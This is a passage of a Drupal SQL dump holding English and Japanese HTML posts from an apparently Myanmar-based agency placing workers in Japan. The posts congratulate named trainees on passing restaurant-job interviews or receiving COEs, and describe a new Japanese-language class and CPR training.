data-message-id=\"aaa2496d-8022-456b-a68f-9edc75f88c0f\" dir=\"auto\"><div class=\"relative max-w-[70%]\"><div>&nbsp;</div></div></div></div></div></div></div></div></div></div></div></div></div>', '', 'full_html'),
('activities', 0, 142, 583, 'ja', 0, '<div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-13\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"409c4610-442f-4274-9140-054f09750c0a\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><blockquote><h2>新コメット語学センターの開校</h2></blockquote><p>新年は、7 月の N4 試験に向けて準備を進めている新しい N5 クラスの導入で始まりました。授業は毎日行われ、定期的に評価が行われます。月曜日から木曜日までは、1 日 1 レッスンを実施し、週末 (金曜日から日曜日) は、生徒の興味を維持し、宿題の単調さを避けるために、ポップクイズ セッションを通じて学習を強化する予定です。学校は当社の代理店と提携しているため、コースを修了すると、生徒が独自に面接を受ける必要がなくなります。現在の外職候補者は、日本に到着する前に、当社の教師による実践的な指導を通じて必須の知識を身に付けます。生徒は毎日の学習ルーチンを守る責任があり、当社はカリキュラムを監督し、日本への移行を支援します。</p><img src=\"/sites/default/files/inline-images/0-02-01-0d82578e4eeb95d45b3aea58a31107f4e9c7d0d57db6f2e0574c644b16cd5938_e03eefd818751014.jpg\" data-entity-uuid=\"f5371587-116f-4dac-879a-34801cef5949\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1f139d1e488c49efedfad0063e5adb305fab7ea9b3724aead3dd0aa73bbea6a3_af144a595daab05e.jpg\" data-entity-uuid=\"5c9a38b1-b151-4d2a-85ae-638b9f1bd956\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4db89c7fb62a68759df9f4c1c421f10a418b7580ebe4baa7cd98a002d77c999e_d43d0c99d892dd0d.jpg\" data-entity-uuid=\"924820ef-7e98-4c7d-9106-32fae2827884\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9aa16490a0b9226fe9b699d6c68553737d2095b7aed085bde1f659dbef90491b_a4dd5e0651b48b68.jpg\" data-entity-uuid=\"3836ec4e-123f-431b-8b58-96e7f9419c3d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-90fa91b1bec3ee89f057af76501a016c3ab6ec0c82a9774b2f3bc99ee300f8bf_56859cbe57067f4a.jpg\" data-entity-uuid=\"8bb4a31e-57a7-4a68-adbc-d48eb54b3c39\" data-entity-type=\"file\"><p>&nbsp;</p></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div></div></div></div></div></div><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-14\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"flex-shrink-0 flex flex-col relative items-end\"><div><div class=\"pt-0.5 juice:pt-0\"><div class=\"gizmo-shadow-stroke flex h-6 w-6 items-center justify-center overflow-hidden rounded-full juice:h-8 juice:w-8\"><div class=\"overflow-hidden rounded-full\"><div class=\"relative flex items-center justify-center bg-blue-300 text-white h-full w-full text-xs\"><svg class=\"icon-sm\" xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M12 4a3 3 0 1 0 0 6 3 3 0 0 0 0-6M7 7a5 5 0 1 1 10 0A5 5 0 0 1 7 7m5 8c-3.656 0-6.5 2.75-6.5 6a1 1 0 1 1-2 0c0-4.482 3.872-8 8.5-8s8.5 3.518 8.5 8a1 1 0 1 1-2 0c0-3.25-2.844-6-6.5-6\" clip-rule=\"evenodd\"></path></svg></div><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"user\" data-message-id=\"aaa2496d-8022-456b-a68f-9edc75f88c0f\" dir=\"auto\"><div class=\"relative max-w-[70%]\"><div>&nbsp;</div></div></div></div></div></div></div></div></div></div></div></div></div>', '', 'full_html'),
('activities', 0, 143, 584, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to HNIN WAI WAI NWE &amp; THIDA KHINE for passing the Interview for TOKUTEI GAISHOKU (Restaurant) to work at JAPAN!&nbsp;</p><img data-entity-uuid=\"136a27cc-954b-42b0-971d-8d1b63070dd2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HNIN%20WAI%20WAI%20NWE_0.jpg\"><img data-entity-uuid=\"6521bdaf-c62a-415f-8023-395970ef8845\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THIDA%20KHAING.jpg\">', '', 'full_html'),
('activities', 0, 143, 585, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to HNIN WAI WAI NWE &amp; THIDA KHINE for passing the Interview for TOKUTEI GAISHOKU (Restaurant) to work at JAPAN!&nbsp;</p><img data-entity-uuid=\"136a27cc-954b-42b0-971d-8d1b63070dd2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HNIN%20WAI%20WAI%20NWE_0.jpg\"><img data-entity-uuid=\"6521bdaf-c62a-415f-8023-395970ef8845\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THIDA%20KHAING.jpg\">', '', 'full_html'),
('activities', 0, 143, 585, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>HNIN WAI WAI NWE さん</strong>と <strong>THIDA KHINE さん</strong>が、日本で働くための TOKUTEI GAISHOKU (レストラン) の面接に合格しました。おめでとうございます!</p><img src=\"/sites/default/files/inline-images/HNIN%20WAI%20WAI%20NWE_0.jpg\" data-entity-uuid=\"136a27cc-954b-42b0-971d-8d1b63070dd2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THIDA%20KHAING.jpg\" data-entity-uuid=\"6521bdaf-c62a-415f-8023-395970ef8845\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 144, 586, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to <strong>AUNG ZIN OO</strong>, <strong>THAN HTUN NAING</strong> , <strong>HTET WAI AUNG</strong> for passing the Interview in TOKUTEI GAISHOKU (Restaurant) to work at TOKYO City , JAPAN.&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"91a6093b-44a2-4e84-a3da-135e75bce780\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/AUNG%20ZIN%20OO.jpg\"><img data-entity-uuid=\"e80c6b10-38a3-4efb-b6ab-c4da3ac20638\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HTET%20WAI%20AUNG.jpg\"><img data-entity-uuid=\"3c95954f-9900-47ee-a83c-7c7c57223146\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THAN%20HTUN%20NAING.jpg\">', '', 'full_html'),
('activities', 0, 144, 587, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to <strong>AUNG ZIN OO</strong>, <strong>THAN HTUN NAING</strong> , <strong>HTET WAI AUNG</strong> for passing the Interview in TOKUTEI GAISHOKU (Restaurant) to work at TOKYO City , JAPAN.&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"91a6093b-44a2-4e84-a3da-135e75bce780\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/AUNG%20ZIN%20OO.jpg\"><img data-entity-uuid=\"e80c6b10-38a3-4efb-b6ab-c4da3ac20638\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HTET%20WAI%20AUNG.jpg\"><img data-entity-uuid=\"3c95954f-9900-47ee-a83c-7c7c57223146\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THAN%20HTUN%20NAING.jpg\">', '', 'full_html'),
('activities', 0, 144, 587, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>AUNG ZIN OO</strong>、<strong>THAN HTUN NAING</strong>、<strong>HTET WAI AUNG </strong>の 3 名が、東京市にある特定外食 (レストラン) の面接に合格し、日本で働くことになりました。おめでとうございます。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/AUNG%20ZIN%20OO.jpg\" data-entity-uuid=\"91a6093b-44a2-4e84-a3da-135e75bce780\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HTET%20WAI%20AUNG.jpg\" data-entity-uuid=\"e80c6b10-38a3-4efb-b6ab-c4da3ac20638\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THAN%20HTUN%20NAING.jpg\" data-entity-uuid=\"3c95954f-9900-47ee-a83c-7c7c57223146\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 145, 588, 'en', 0, '<blockquote><h2>Congratulations For Getting COE!</h2></blockquote><p>Congratulations KYAW ZIN LATT For Getting COE</p><img data-entity-uuid=\"93bf4257-01d8-460a-90c5-2387e8fe731f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Kyaw%20Zin%20Latt%20COE.png\">', '', 'full_html'),
('activities', 0, 145, 589, 'en', 0, '<blockquote><h2>Congratulations For Getting COE!</h2></blockquote><p>Congratulations KYAW ZIN LATT For Getting COE</p><img data-entity-uuid=\"93bf4257-01d8-460a-90c5-2387e8fe731f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Kyaw%20Zin%20Latt%20COE.png\">', '', 'full_html'),
('activities', 0, 145, 589, 'ja', 0, '<blockquote><h2>COE 取得おめでとうございます!</h2><p>KYAW ZIN LATT さん、COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/Kyaw%20Zin%20Latt%20COE.png\" data-entity-uuid=\"93bf4257-01d8-460a-90c5-2387e8fe731f\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 146, 590, 'en', 0, '<blockquote><h2><strong>Congratulations For Passing the Interview!</strong></h2></blockquote><p>Congratulations THET HTAR MYINT KO &amp; HSU MYAT HMUE &amp; HNIN YU HLAING &amp; WAI WAI KHAING &amp; CHAW HSU THWE For Passing the Interview.</p><img src=\"/sites/default/files/inline-images/0-02-01-3aaac1a8cf46db7afbf1ba279a392d065bc0de9b2e11aa353d05c993ab01f4e6_26416f73e7297c33.jpg\" data-entity-uuid=\"5ba053c9-57d5-46a1-aa41-290b134ad527\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7bbc4935551cb3531971de4e52cce30795a7fb08a9648e45e3b7e2c86b1d593f_f228354916e16e5b.jpg\" data-entity-uuid=\"0d1f997b-9db7-4e2b-8b3f-3caabdfaa4f9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-74586f10937c7b31208857c97264bd1c58356742ddc62774c90c22e038db8a11_fb89567823dc4d23.jpg\" data-entity-uuid=\"e12d1dc7-8dcf-4a4b-85c3-7a00d67c2935\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e69ec795d6cea4ad5b07e285c04dc07e6ee3df95f2047d5f04a532c673e2d924_b1e5d38117488313.jpg\" data-entity-uuid=\"9e8daeaa-660e-40ff-abca-e9176210ec34\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-4b3c2728de3756b346a79f8476f78e46b7f7d46836fa7fbe883c7a0e13f97402_b42b620cfc9f74f4.jpg\" data-entity-uuid=\"06bc64cb-d094-4438-b095-f5a9d0a54f38\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 146, 591, 'en', 0, '<blockquote><h2><strong>Congratulations For Passing the Interview!</strong></h2></blockquote><p>Congratulations THET HTAR MYINT KO &amp; HSU MYAT HMUE &amp; HNIN YU HLAING &amp; WAI WAI KHAING &amp; CHAW HSU THWE For Passing the Interview.</p><img src=\"/sites/default/files/inline-images/0-02-01-3aaac1a8cf46db7afbf1ba279a392d065bc0de9b2e11aa353d05c993ab01f4e6_26416f73e7297c33.jpg\" data-entity-uuid=\"5ba053c9-57d5-46a1-aa41-290b134ad527\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7bbc4935551cb3531971de4e52cce30795a7fb08a9648e45e3b7e2c86b1d593f_f228354916e16e5b.jpg\" data-entity-uuid=\"0d1f997b-9db7-4e2b-8b3f-3caabdfaa4f9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-74586f10937c7b31208857c97264bd1c58356742ddc62774c90c22e038db8a11_fb89567823dc4d23.jpg\" data-entity-uuid=\"e12d1dc7-8dcf-4a4b-85c3-7a00d67c2935\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e69ec795d6cea4ad5b07e285c04dc07e6ee3df95f2047d5f04a532c673e2d924_b1e5d38117488313.jpg\" data-entity-uuid=\"9e8daeaa-660e-40ff-abca-e9176210ec34\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-4b3c2728de3756b346a79f8476f78e46b7f7d46836fa7fbe883c7a0e13f97402_b42b620cfc9f74f4.jpg\" data-entity-uuid=\"06bc64cb-d094-4438-b095-f5a9d0a54f38\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 146, 591, 'ja', 0, '<blockquote><h2>面接合格おめでとうございます！</h2><p>THET HTAR MYINT KO、HSU MYAT HMUE、HNIN YU HLAING、WAI WAI KHAING、CHAW HSU THWE の皆さん、面接合格おめでとうございます。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-3aaac1a8cf46db7afbf1ba279a392d065bc0de9b2e11aa353d05c993ab01f4e6_26416f73e7297c33.jpg\" data-entity-uuid=\"5ba053c9-57d5-46a1-aa41-290b134ad527\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7bbc4935551cb3531971de4e52cce30795a7fb08a9648e45e3b7e2c86b1d593f_f228354916e16e5b.jpg\" data-entity-uuid=\"0d1f997b-9db7-4e2b-8b3f-3caabdfaa4f9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-74586f10937c7b31208857c97264bd1c58356742ddc62774c90c22e038db8a11_fb89567823dc4d23.jpg\" data-entity-uuid=\"e12d1dc7-8dcf-4a4b-85c3-7a00d67c2935\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e69ec795d6cea4ad5b07e285c04dc07e6ee3df95f2047d5f04a532c673e2d924_b1e5d38117488313.jpg\" data-entity-uuid=\"9e8daeaa-660e-40ff-abca-e9176210ec34\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-4b3c2728de3756b346a79f8476f78e46b7f7d46836fa7fbe883c7a0e13f97402_b42b620cfc9f74f4.jpg\" data-entity-uuid=\"06bc64cb-d094-4438-b095-f5a9d0a54f38\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 146, 592, 'en', 0, '<blockquote><h2><strong>Congratulations For Passing the Interview!</strong></h2></blockquote><p>Congratulations THET HTAR MYINT KO &amp; HSU MYAT HMUE &amp; HNIN YU HLAING &amp; WAI WAI KHAING &amp; CHAW HSU THWE For Passing the Interview.</p><img src=\"/sites/default/files/inline-images/0-02-01-3aaac1a8cf46db7afbf1ba279a392d065bc0de9b2e11aa353d05c993ab01f4e6_26416f73e7297c33.jpg\" data-entity-uuid=\"5ba053c9-57d5-46a1-aa41-290b134ad527\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7bbc4935551cb3531971de4e52cce30795a7fb08a9648e45e3b7e2c86b1d593f_f228354916e16e5b.jpg\" data-entity-uuid=\"0d1f997b-9db7-4e2b-8b3f-3caabdfaa4f9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-74586f10937c7b31208857c97264bd1c58356742ddc62774c90c22e038db8a11_fb89567823dc4d23.jpg\" data-entity-uuid=\"e12d1dc7-8dcf-4a4b-85c3-7a00d67c2935\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e69ec795d6cea4ad5b07e285c04dc07e6ee3df95f2047d5f04a532c673e2d924_b1e5d38117488313.jpg\" data-entity-uuid=\"9e8daeaa-660e-40ff-abca-e9176210ec34\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-4b3c2728de3756b346a79f8476f78e46b7f7d46836fa7fbe883c7a0e13f97402_b42b620cfc9f74f4.jpg\" data-entity-uuid=\"06bc64cb-d094-4438-b095-f5a9d0a54f38\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 146, 592, 'ja', 0, '<blockquote><h2>面接合格おめでとうございます！</h2><p>THET HTAR MYINT KO、HSU MYAT HMUE、HNIN YU HLAING、WAI WAI KHAING、CHAW HSU THWE の皆さん、面接合格おめでとうございます。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-3aaac1a8cf46db7afbf1ba279a392d065bc0de9b2e11aa353d05c993ab01f4e6_26416f73e7297c33.jpg\" data-entity-uuid=\"5ba053c9-57d5-46a1-aa41-290b134ad527\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7bbc4935551cb3531971de4e52cce30795a7fb08a9648e45e3b7e2c86b1d593f_f228354916e16e5b.jpg\" data-entity-uuid=\"0d1f997b-9db7-4e2b-8b3f-3caabdfaa4f9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-74586f10937c7b31208857c97264bd1c58356742ddc62774c90c22e038db8a11_fb89567823dc4d23.jpg\" data-entity-uuid=\"e12d1dc7-8dcf-4a4b-85c3-7a00d67c2935\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e69ec795d6cea4ad5b07e285c04dc07e6ee3df95f2047d5f04a532c673e2d924_b1e5d38117488313.jpg\" data-entity-uuid=\"9e8daeaa-660e-40ff-abca-e9176210ec34\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-4b3c2728de3756b346a79f8476f78e46b7f7d46836fa7fbe883c7a0e13f97402_b42b620cfc9f74f4.jpg\" data-entity-uuid=\"06bc64cb-d094-4438-b095-f5a9d0a54f38\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 146, 593, 'en', 0, '<blockquote><h2><strong>Congratulations For Passing the Interview!</strong></h2></blockquote><p>Congratulations THET HTAR MYINT KO &amp; HSU MYAT HMUE &amp; HNIN YU HLAING &amp; WAI WAI KHAING &amp; CHAW HSU THWE For Passing the Interview.</p><img src=\"/sites/default/files/inline-images/0-02-01-3aaac1a8cf46db7afbf1ba279a392d065bc0de9b2e11aa353d05c993ab01f4e6_26416f73e7297c33.jpg\" data-entity-uuid=\"5ba053c9-57d5-46a1-aa41-290b134ad527\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7bbc4935551cb3531971de4e52cce30795a7fb08a9648e45e3b7e2c86b1d593f_f228354916e16e5b.jpg\" data-entity-uuid=\"0d1f997b-9db7-4e2b-8b3f-3caabdfaa4f9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-74586f10937c7b31208857c97264bd1c58356742ddc62774c90c22e038db8a11_fb89567823dc4d23.jpg\" data-entity-uuid=\"e12d1dc7-8dcf-4a4b-85c3-7a00d67c2935\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e69ec795d6cea4ad5b07e285c04dc07e6ee3df95f2047d5f04a532c673e2d924_b1e5d38117488313.jpg\" data-entity-uuid=\"9e8daeaa-660e-40ff-abca-e9176210ec34\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-4b3c2728de3756b346a79f8476f78e46b7f7d46836fa7fbe883c7a0e13f97402_b42b620cfc9f74f4.jpg\" data-entity-uuid=\"06bc64cb-d094-4438-b095-f5a9d0a54f38\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 146, 593, 'ja', 0, '<blockquote><h2>面接合格おめでとうございます！</h2><p>THET HTAR MYINT KO、HSU MYAT HMUE、HNIN YU HLAING、WAI WAI KHAING、CHAW HSU THWE の皆さん、面接合格おめでとうございます。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-3aaac1a8cf46db7afbf1ba279a392d065bc0de9b2e11aa353d05c993ab01f4e6_26416f73e7297c33.jpg\" data-entity-uuid=\"5ba053c9-57d5-46a1-aa41-290b134ad527\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7bbc4935551cb3531971de4e52cce30795a7fb08a9648e45e3b7e2c86b1d593f_f228354916e16e5b.jpg\" data-entity-uuid=\"0d1f997b-9db7-4e2b-8b3f-3caabdfaa4f9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-74586f10937c7b31208857c97264bd1c58356742ddc62774c90c22e038db8a11_fb89567823dc4d23.jpg\" data-entity-uuid=\"e12d1dc7-8dcf-4a4b-85c3-7a00d67c2935\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e69ec795d6cea4ad5b07e285c04dc07e6ee3df95f2047d5f04a532c673e2d924_b1e5d38117488313.jpg\" data-entity-uuid=\"9e8daeaa-660e-40ff-abca-e9176210ec34\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-4b3c2728de3756b346a79f8476f78e46b7f7d46836fa7fbe883c7a0e13f97402_b42b620cfc9f74f4.jpg\" data-entity-uuid=\"06bc64cb-d094-4438-b095-f5a9d0a54f38\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 147, 594, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><h6>Congratulations KYAW ZIN LATT &nbsp;for getting COE with TOKUTEI GAISHOKU to work at JAPAN!&nbsp;</h6><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/kyaw%20zin%20latt%20coe_0.jpg\" data-entity-uuid=\"d5c54eb8-b360-42fd-a621-a02c9b8a0d33\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 147, 595, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><h6>Congratulations KYAW ZIN LATT &nbsp;for getting COE with TOKUTEI GAISHOKU to work at JAPAN!&nbsp;</h6><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/kyaw%20zin%20latt%20coe_0.jpg\" data-entity-uuid=\"d5c54eb8-b360-42fd-a621-a02c9b8a0d33\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 147, 595, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><h6>KYAW ZIN LATT さん、TOKUTEI GAISHOKU から COE を取得して日本で働くことができました、おめでとうございます!</h6><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/kyaw%20zin%20latt%20coe_0.jpg\" data-entity-uuid=\"d5c54eb8-b360-42fd-a621-a02c9b8a0d33\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 148, 596, 'en', 0, '<blockquote><h2>Congratulations!&nbsp;</h2></blockquote><p>Congratulations MYO KHANT For Getting COE &nbsp;</p><img data-entity-uuid=\"42659e2d-59b0-406d-821d-154a4a4c5291\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-8bcc150299aff383a3e46cc149e3d1562bb511c9bb2c03579b14d971cbf492ec_9afbe7a470291031.jpg\">', '', 'full_html'),
('activities', 0, 148, 597, 'en', 0, '<blockquote><h2>Congratulations!&nbsp;</h2></blockquote><p>Congratulations MYO KHANT For Getting COE &nbsp;</p><img data-entity-uuid=\"42659e2d-59b0-406d-821d-154a4a4c5291\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-8bcc150299aff383a3e46cc149e3d1562bb511c9bb2c03579b14d971cbf492ec_9afbe7a470291031.jpg\">', '', 'full_html'),
('activities', 0, 148, 597, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2><p>MYO KHANT さん、COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-06-8bcc150299aff383a3e46cc149e3d1562bb511c9bb2c03579b14d971cbf492ec_9afbe7a470291031.jpg\" data-entity-uuid=\"42659e2d-59b0-406d-821d-154a4a4c5291\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 149, 598, 'en', 0, '<blockquote><h2>Congratulations For Passing the Interview!</h2></blockquote><p>Congratulations THAN WIN SOE &amp; HSU YANDAR &nbsp;For Passing the Interview</p><img data-entity-uuid=\"9b6269cc-ed01-49dc-8e19-ba93f8a81733\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/con%20con%202.jpg\"><img data-entity-uuid=\"75d218dc-cd4d-409a-b96a-ee635cb5eac0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/con%20con.jpg\">', '', 'full_html'),
('activities', 0, 150, 599, 'en', 0, '<blockquote><h2>Training about CPR(Kaigo)</h2></blockquote><p>They are diligently engaged in their endeavors within the Akita district of Japan, hoping for the opportunity to reside in the country for an extended period.</p><img data-entity-uuid=\"ad5e101a-5241-43cd-9069-d760e9ef3c36\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_4.jpg\"><img data-entity-uuid=\"a20f83b8-a905-41b8-9079-ac4b161e1e7b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_4.jpg\"><img data-entity-uuid=\"f6c7d9b8-a004-4b48-947e-c507abda48cd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_4.jpg\"><img data-entity-uuid=\"5f8315d4-ffef-4281-a387-e6aa2d39c807\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_4.jpg\"><img data-entity-uuid=\"53bf4679-be37-45b4-8b6c-9d7805cee062\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5_2.jpg\"><img data-entity-uuid=\"b4f638b2-4d3a-4997-869d-30c5ec49b2b7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6_2.jpg\"><img data-entity-uuid=\"18d57598-7865-4a60-a82a-729bfef38207\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/7_1.jpg\"><img data-entity-uuid=\"c43806d7-2f92-4a6c-8c06-6c82f3900d19\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/8_1.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 150, 600, 'en', 0, '<blockquote><h2>Training about CPR(Kaigo)</h2></blockquote><p>They are diligently engaged in their endeavors within the Akita district of Japan, hoping for the opportunity to reside in the country for an extended period.</p><img data-entity-uuid=\"ad5e101a-5241-43cd-9069-d760e9ef3c36\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_4.jpg\"><img data-entity-uuid=\"a20f83b8-a905-41b8-9079-ac4b161e1e7b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_4.jpg\"><img data-entity-uuid=\"f6c7d9b8-a004-4b48-947e-c507abda48cd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_4.jpg\"><img data-entity-uuid=\"5f8315d4-ffef-4281-a387-e6aa2d39c807\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_4.jpg\"><img data-entity-uuid=\"53bf4679-be37-45b4-8b6c-9d7805cee062\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5_2.jpg\"><img data-entity-uuid=\"b4f638b2-4d3a-4997-869d-30c5ec49b2b7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6_2.jpg\"><img data-entity-uuid=\"18d57598-7865-4a60-a82a-729bfef38207\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/7_1.jpg\"><img 